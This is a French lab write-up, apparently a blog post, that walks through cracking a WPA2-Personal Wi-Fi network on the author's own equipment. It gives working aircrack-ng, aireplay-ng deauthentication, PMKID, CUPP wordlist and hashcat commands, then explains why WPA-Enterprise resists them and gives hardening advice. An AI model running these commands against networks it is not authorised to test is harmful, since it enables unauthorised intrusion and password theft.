⚠️ Avertissement Legal et Ethique
Ce contenu est strictement educatif. Les techniques presentees ne doivent etre utilisees que sur des reseaux dont vous etes proprietaire ou pour lesquels vous avez une autorisation ecrite explicite.
L'acces non autorise a un reseau informatique est un delit puni par la loi (Article 323-1 du Code penal francais : jusqu'a 2 ans d'emprisonnement et 60 000€ d'amende).
Testez uniquement sur votre propre equipement dans un environnement controle.
📡 Introduction : La realite du terrain
Sur le papier, le WPA3 devrait avoir rendu ces attaques obsoletes. Ce protocole introduit le Simultaneous Authentication of Equals (SAE), une protection bien plus robuste contre les attaques par dictionnaire.
Mais la realite est tout autre...
📊 Les chiffres qui surprennent (WiGLE, 2026)
- ~75% des points d'acces mondiaux utilisent encore WPA2
- En France, ce chiffre depasse egalement les 70%
- Source : wigle.net/stats
Cette predominance du WPA2-Personal (PSK) dans les reseaux domestiques et PME, combinee a des mots de passe souvent previsibles (prenoms, dates de naissance, suites logiques), rend ces reseaux particulierement vulnerables aux attaques par dictionnaire.
🛠️ Le Lab : Configuration du banc de test
Pour ce lab de penetration testing Wi-Fi, j'ai utilise le materiel suivant :
Attaquant
Raspberry Pi 5
Kali Linux ARM
Chipset Broadcom 43455
Point d'Acces
Cisco Small Business
WPA2-Personal (PSK)
Canal 11
Client Cible
Smartphone Android
Connecte au reseau
(pour forcer le handshake)
💡 Note sur le chipset
Le Broadcom 43455 integre au Raspberry Pi supporte le mode monitor, mais avec quelques limitations. Pour des tests plus avancés, une carte USB externe comme l'Alfa AWUS036ACH est recommandee.
🔧 Etape 1 : Preparation de l'interface
1 Verification de l'interface Wi-Fi
iw dev
dev : Affiche les informations sur les peripheriques wireless
Resultat attendu :
L'interface wlan0 est en mode managed (mode normal). Nous devons la passer en monitor.
2 Verification des processus interferents
sudo airmon-ng check
check : Liste les processus susceptibles d'interferer
3 Activation du mode monitor
sudo airmon-ng check kill
sudo airmon-ng start wlan0
start wlan0 : Active le mode monitor sur l'interface wlan0
L'interface wlan0mon est maintenant creee en mode monitor.
🔍 Etape 2 : Reconnaissance des reseaux
sudo airodump-ng wlan0mon
wlan0mon : Interface en mode monitor a utiliser
Resultat :
📖 Lecture de l'output
- BSSID : Adresse MAC du point d'acces
- PWR : Puissance du signal (plus proche de 0 = plus fort)
- CH : Canal utilise
- ENC : Type de chiffrement (WPA2, WPA, OPN...)
- AUTH : Methode d'authentification (PSK = Pre-Shared Key, MGT = Enterprise/RADIUS)
- ESSID : Nom du reseau
On identifie notre cible : WI-FI_de_Jordao (BSSID: C8:3A:35:2B:9F:D4) sur le canal 11 en WPA2-PSK.
Notez que NetCampus-Secure utilise MGT (WPA2-Enterprise) - nous verrons pourquoi cette cible est beaucoup plus complexe a attaquer.
🤝 Etape 3 : Capture du 4-Way Handshake
Le 4-way handshake est l'echange de 4 messages EAPOL entre le client et le point d'acces lors de la connexion. Il contient les elements cryptographiques necessaires pour verifier un mot de passe hors-ligne.
1 Cibler le reseau et capturer le trafic
sudo airodump-ng -w capturewifi --bssid C8:3A:35:2B:9F:D4 -c 11 wlan0mon
--bssid C8:3A:35:2B:9F:D4 : Filtre sur l'adresse MAC du point d'acces cible
-c 11 : Se concentre sur le canal 11 (plus de precision)
wlan0mon : Interface en mode monitor
On voit un client connecte (STATION: F8:B2:4A:1C:D7:93). Nous pouvons forcer sa deconnexion pour capturer le handshake lors de sa reconnexion.
2 Attaque de desauthentification
Dans un second terminal, lancez l'attaque deauth :
sudo aireplay-ng --deauth 10 -a C8:3A:35:2B:9F:D4 -c F8:B2:4A:1C:D7:93 wlan0mon
-a C8:3A:35:2B:9F:D4 : Adresse MAC du point d'acces (AP)
-c F8:B2:4A:1C:D7:93 : Adresse MAC du client a deconnecter
wlan0mon : Interface en mode monitor
3 Confirmation de la capture
Retournez au premier terminal. Quand le handshake est capture, vous verrez :
✅ Handshake capture !
Le message [ WPA handshake: C8:3A:35:2B:9F:D4 ] confirme la capture. Le fichier capturewifi-01.cap contient maintenant le handshake.
⚡ Alternative : Attaque PMKID (sans client)
L'attaque PMKID (decouverte en 2018) permet de recuperer un hash sans avoir besoin d'un client connecte ni de capturer un handshake complet. Elle exploite le premier message EAPOL envoye par l'AP.
🔬 Pourquoi c'est puissant ?
- Pas besoin d'attendre qu'un client se connecte
- Pas besoin d'attaque de desauthentification
- Plus discret (moins de trafic anormal)
Avec Wifite, l'attaque PMKID est tentee automatiquement :
sudo wifite --dict ./wordlist.txt
--dict ./wordlist.txt : Dictionnaire a utiliser pour le cracking
Si le PMKID n'est pas disponible, Wifite basculera automatiquement sur la capture de handshake classique.
📝 Etape 4 : Generation d'un dictionnaire cible
CUPP (Common User Passwords Profiler) permet de generer des wordlists personnalisees basees sur des informations connues de la cible.
cupp -i
-i : Mode interactif (questions-reponses)
Ce dictionnaire de ~3000 mots contient des combinaisons basees sur le prenom, nom, surnom et date de naissance avec variations (majuscules, chiffres, caracteres speciaux).
🔓 Etape 5 : Cracking avec Aircrack-ng
sudo aircrack-ng capturewifi-01.cap -w jordao.txt
capturewifi-01.cap : Fichier de capture contenant le handshake
-w jordao.txt : Wordlist a utiliser pour l'attaque par dictionnaire
✅ Mot de passe trouve !
KEY FOUND! [ Jordao2026! ]
Le mot de passe a ete trouve en 14 secondes parmi 3007 candidats. Un mot de passe previsible (prenom + annee + caractere special) a ete cracke facilement.
🚀 Alternative : Cracking avec Hashcat (GPU)
Hashcat exploite la puissance des GPU pour accelerer considerablement le cracking. Il supporte le format hc22000 pour WPA/WPA2.
1 Conversion du fichier .cap
hcxpcapngtool -o hash.hc22000 capturewifi-01.cap
-o hash.hc22000 : Fichier de sortie au format hc22000
capturewifi-01.cap : Fichier de capture source
2 Cracking avec GPU
hashcat -m 22000 hash.hc22000 wordlist.txt -d 1
-m 22000 : Mode WPA-PBKDF2-PMKID+EAPOL
hash.hc22000 : Fichier de hash a cracker
wordlist.txt : Dictionnaire
-d 1 : Utilise le device GPU #1
⚡ Performance
Avec une carte graphique moderne (RTX 3070+), hashcat peut tester des millions de mots de passe par seconde contre quelques centaines pour aircrack-ng sur CPU.
🤖 Methode Automatisee : Wifite
Wifite automatise l'ensemble du processus : scan, capture PMKID, capture handshake, desauth, et cracking.
sudo wifite --dict ./jordao.txt
🏢 Pourquoi WPA-Enterprise resiste a ces attaques
Durant mon scan, j'ai repere NetCampus-Secure avec AUTH: MGT (Management = Enterprise). Pourquoi ces techniques echouent-elles sur ce type de reseau ?
| Aspect | WPA2-Personal (PSK) | WPA2-Enterprise (RADIUS) |
|---|---|---|
| Authentification | Mot de passe partage unique | Identifiants individuels par utilisateur |
| Cle de session | Derivee du PSK (identique pour tous) | Unique par session, generee par RADIUS |
| Attaque dictionnaire | ✅ Possible (handshake capture) | ❌ Impossible (pas de hash exploitable) |
| Attaque PMKID | ✅ Possible | ❌ Impossible |
| Compromission | 1 mot de passe = tout le reseau | 1 compte = 1 utilisateur (revocable) |
🔐 J'ai configure du WPA-Enterprise dans mon projet precedent
Dans le cadre de la modernisation d'une infrastructure reseau, j'ai deploye un Wi-Fi "Prive" en WPA3-Enterprise avec authentification RADIUS (NPS) liee a l'Active Directory.
Cette configuration rend les attaques presentees dans cet article totalement inefficaces.
🎯 Prochaines etapes : Attaquer le WPA-Enterprise ?
Auditer un reseau WPA-Enterprise necessite des techniques plus avancees :
- Rogue AP / Evil Twin : Creer un faux point d'acces pour intercepter les tentatives de connexion
- Rogue RADIUS : Simuler un serveur RADIUS pour capturer les identifiants
- Interception de certificats : Exploiter les clients qui ne valident pas correctement les certificats du serveur RADIUS
- Attaques sur PEAP/MSCHAPv2 : Capturer les challenges-responses et tenter de les cracker
Ces techniques feront l'objet d'un prochain article...
✅ Conclusion
Ce lab demontre que le WPA2-Personal reste vulnerable aux attaques par dictionnaire, surtout avec des mots de passe previsibles. Quelques recommandations :
- Utilisez des mots de passe longs et aleatoires (20+ caracteres)
- Preferez WPA3 si vos equipements le supportent
- Pour les entreprises : WPA2/WPA3-Enterprise avec RADIUS
- Activez le Management Frame Protection (MFP/802.11w) pour bloquer les attaques deauth